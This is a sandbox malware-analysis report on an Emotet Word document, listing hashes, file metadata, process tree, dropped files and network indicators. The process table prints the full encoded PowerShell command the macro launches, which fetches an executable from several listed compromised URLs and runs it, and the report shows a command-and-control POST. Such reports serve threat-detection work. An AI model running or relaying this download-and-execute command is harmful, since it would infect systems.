Malware analysis cxDXknmMpgJCGLrsXOHGoicZqWSiwT Malicious activity

Add for printing

download:	cxDXknmMpgJCGLrsXOHGoicZqWSiwT
Full analysis:	https://app.any.run/tasks/76fb164a-4c38-4e3d-b76c-b38601349c65
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Malware Trends Tracker >>>
Analysis date:	October 09, 2019, 15:03:28
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open emotet-doc emotet generated-doc
Indicators:
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Director, Subject: monitor, Author: Jasen Mraz, Keywords: matrix, Comments: Small Soft Chair, Template: Normal.dotm, Last Saved By: Westley Ratke, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:18:00 2019, Last Saved Time/Date: Wed Oct 9 13:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5:	98F841E009E22CB0F93D5FBAB024EBE1
SHA1:	7AE04AACF375E8C1D1A9DCBC8F781365AFF572BA
SHA256:	AB84D56CFB83E7D44AD4790ABDFE4922B93BCF05B0C1B2FF6DB307FADBEBC133
SSDEEP:	3072:teGRyYpKgdzSrGtKyIwLx3Q7JsbVWhnmApAFx1Gam73aSWuns2w4DYAF9I:teGRyYpKUzSSnLx3yzOYVHs2f

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Application was dropped or rewritten from another process
  - 178.exe (PID: 2316)
  - 178.exe (PID: 3072)
  - msptermsizes.exe (PID: 1248)
  - msptermsizes.exe (PID: 3364)
- Emotet process was detected
  - 178.exe (PID: 3072)
SUSPICIOUS
- Executable content was dropped or overwritten
  - powershell.exe (PID: 2356)
  - 178.exe (PID: 3072)
- Executed via WMI
  - powershell.exe (PID: 2356)
- PowerShell script executed
  - powershell.exe (PID: 2356)
- Creates files in the user directory
  - powershell.exe (PID: 2356)
- Starts itself from another location
  - 178.exe (PID: 3072)
INFO
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 3192)
- Creates files in the user directory
  - WINWORD.EXE (PID: 3192)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType:	Microsoft Word 97-2003 Document
CompObjUserTypeLen:	32
Manager:	Abernathy
HeadingPairs:	Title 1
TitleOfParts:	-
HyperlinksChanged:	No
SharedDoc:	No
LinksUpToDate:	No
ScaleCrop:	No
AppVersion:	16
CharCountWithSpaces:	196
Paragraphs:	1
Lines:	1
Company:	Wilderman, Sipes and Towne
CodePage:	Windows Latin 1 (Western European)
Security:	None
Characters:	168
Words:	29
Pages:	1
ModifyDate:	2019:10:09 12:18:00
CreateDate:	2019:10:09 12:18:00
TotalEditTime:	-
Software:	Microsoft Office Word
RevisionNumber:	1
LastModifiedBy:	Westley Ratke
Template:	Normal.dotm
Comments:	Small Soft Chair
Keywords:	matrix
Author:	Jasen Mraz
Subject:	monitor
Title:	Director

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3192	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\cxDXknmMpgJCGLrsXOHGoicZqWSiwT.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2356	powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAAwADUAMwAyAGMANAAwADAAPQAnAGIAMAAwADQANAA5ADQAeAA0ADUANgAnADsAJABjADIANQA3ADQAYwAyADQAOAAxADcAIAA9ACAAJwAxADcAOAAnADsAJABiADcAYgA0ADcAeAAzADAAMAA2ADcAMQBjAD0AJwBiADQANwAwADMAOAA0ADUAMQAwADAAJwA7ACQAYwA4ADEANgA4AGMAOAA0ADMAOQA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADIANQA3ADQAYwAyADQAOAAxADcAKwAnAC4AZQB4AGUAJwA7ACQAeAAzADIANwAzADQAOAA2ADIANQAyAD0AJwBjADAAMwAwAGMANwA1ADAAMAB4ADAAMgA5ACcAOwAkAGMANgA5AGMAMAAwADgANAAyADAAYwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AVAA7ACQAYgAwADUAMAA0AGIAYwBjADYAYgBjADAAOAA9ACcAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AUwBXAFMAeQBpAEsATgB6AGYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBoAG8AcABlAGgAZQByAGIAYQBsAC4AYwBvAG0ALwB0AHIAbwBwAGkAYwBhAC8AUABBAGIATABQAFEAQgBTAC8AQABoAHQAdABwAHMAOgAvAC8AZQAtAGMAZQBuAHQAcgBpAGMAaQB0AHkALgBjAG8AbQAvAGMAcwBzAC8AegBjAG4ASQBkAFcAVQBoAGIAZAAvAEAAaAB0AHQAcABzADoALwAvAG4AZQB3AGEAZwBlAHMAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFcARQBIAHEARAB3AGoAdwBTAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdwBlAHMAdABiAHUAcgB5AGQAZQBuAHQAYQBsAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHYAZwAxAGsAXwAxAGQAcgA1AGMAZAAtADkAOQA5AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoACcAQAAnACkAOwAkAHgAMAA3ADgAMAB4ADkANgAyAHgAMAA9ACcAYgAxADAAMwAyADcAMAA0AGMANAA4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABjAGIAYwA3ADEAMwA5AHgAOQA2AGIAIABpAG4AIAAkAGIAMAA1ADAANABiAGMAYwA2AGIAYwAwADgAKQB7AHQAcgB5AHsAJABjADYAOQBjADAAMAA4ADQAMgAwAGMALgAiAGQATwBXAGAATgBMAG8AYABBAGQARgBpAGAATABlACIAKAAkAGMAYgBjADcAMQAzADkAeAA5ADYAYgAsACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAeABjADIAMwAzADgAYwA0ADQANAAwADcAPQAnAGMANQBiADAAMgAwADEANAA3AGIANwAwAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANgA1ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAYgAwADMAMwA5ADcAMQAwADgAMQA3ADAAYwA9ACcAYwA3ADAAMAAwAGIANwA0ADYANAAwACcAOwBiAHIAZQBhAGsAOwAkAGMAMwA2ADAANgA0ADAAMAAyADMAMAA9ACcAeABiAGIAMgAyADIAMAAwADAANAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAMAA2ADAAMAAwAHgAMABjADMAOQAwADMAPQAnAHgANgAxADAANwA4ADAANQAyADIAYgA4ADAAJwA=	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2316	"C:\Users\admin\178.exe"	C:\Users\admin\178.exe	—	powershell.exe
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1
3072	--3a2e7ef0	C:\Users\admin\178.exe		178.exe
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1
1248	"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"	C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe	—	178.exe
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1
3364	--f91b2738	C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe		msptermsizes.exe
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Version: 1, 0, 0, 1

Add for printing

Total events

1 751

Read events

1 238

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3192	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVRD02.tmp.cvr		—
		MD5:—	SHA256:—
2356	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\577DGZ45OD46HYI4SNGS.temp		—
		MD5:—	SHA256:—
3192	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5310823D.wmf		wmf
		MD5:3904440B860F48D98CF95199D50E5AC8	SHA256:374FBDA7CB06FF3CD25B7B05EE3B0E008CF81B137D81ABE32A9712D350CE2A29
3192	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:6D7637FCFC19C4EBB24C88780E0DDF2F	SHA256:6154E11CA5F0A23371E735F7EBC610B7406BA64E350B0BE253C589A608579EE2
3192	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB68F238.wmf		wmf
		MD5:AEE072B89BBE8D1ED3A82CEDC441E725	SHA256:01B89C7C6602B5B1C56319321279E6F9B269CAB8B81D17F52903257523B83525
3192	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8ED4ED4F.wmf		wmf
		MD5:78968EB6613489B47B425C8EA66F27A8	SHA256:C29EEAF6B10A597DDC0C55E3E5DAB4F5F2925607292459751BCCCECF780F62D7
3192	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd		tlb
		MD5:250089E9F3ED1895EF05612319E2EB57	SHA256:1438561F31B1685F96B67F07045CBA87F3D6D56E6C7F483EF00D7EAB00E08884
3192	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44148704.wmf		wmf
		MD5:7CC576F264A0711285A2021D1C573A6B	SHA256:22F9CE3848F9E00BBAC1CC251AFB1C8BDCAC59C6FB01EB3602A82A9AE537455B
3192	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\370BF7B2.wmf		wmf
		MD5:7C98DA6FA149EED5B458BE48A0FD0C25	SHA256:96A7F9BD839F537614C64FE2998AF1D215937564309A339569F15E297DDBE7EA
3192	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23AD6D06.wmf		wmf
		MD5:6550425ED1CA16EA5973A4613746EBCA	SHA256:B9BA41647333B2FD4056D389010A210EB7810EED9AE937B98B37697B4584D584

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3364	msptermsizes.exe	POST	—	23.239.29.211:443	http://23.239.29.211:443/raster/	US	—	—	malicious
2356	powershell.exe	GET	403	146.88.234.116:80	http://stephporn.com/cgi-bin/oSWSyiKNzf/	FR	html	318 b	suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3364	msptermsizes.exe	23.239.29.211:443	—	Linode, LLC	US	malicious
2356	powershell.exe	43.255.154.26:443	thehopeherbal.com	GoDaddy.com, LLC	SG	suspicious
2356	powershell.exe	35.238.93.185:443	e-centricity.com	—	US	unknown
2356	powershell.exe	146.88.234.116:80	stephporn.com	PlanetHoster	FR	suspicious

DNS requests

Domain	IP	Reputation
stephporn.com	146.88.234.116	suspicious
thehopeherbal.com	43.255.154.26	suspicious
e-centricity.com	35.238.93.185	malicious

Threats

No threats detected

Add for printing

No debug info

General Info

cxDXknmMpgJCGLrsXOHGoicZqWSiwT

98F841E009E22CB0F93D5FBAB024EBE1

7AE04AACF375E8C1D1A9DCBC8F781365AFF572BA

AB84D56CFB83E7D44AD4790ABDFE4922B93BCF05B0C1B2FF6DB307FADBEBC133

3072:teGRyYpKgdzSrGtKyIwLx3Q7JsbVWhnmApAFx1Gam73aSWuns2w4DYAF9I:teGRyYpKUzSSnLx3yzOYVHs2f

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Application was dropped or rewritten from another process

Emotet process was detected

SUSPICIOUS

Executable content was dropped or overwritten

Executed via WMI

PowerShell script executed

Creates files in the user directory

Starts itself from another location

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings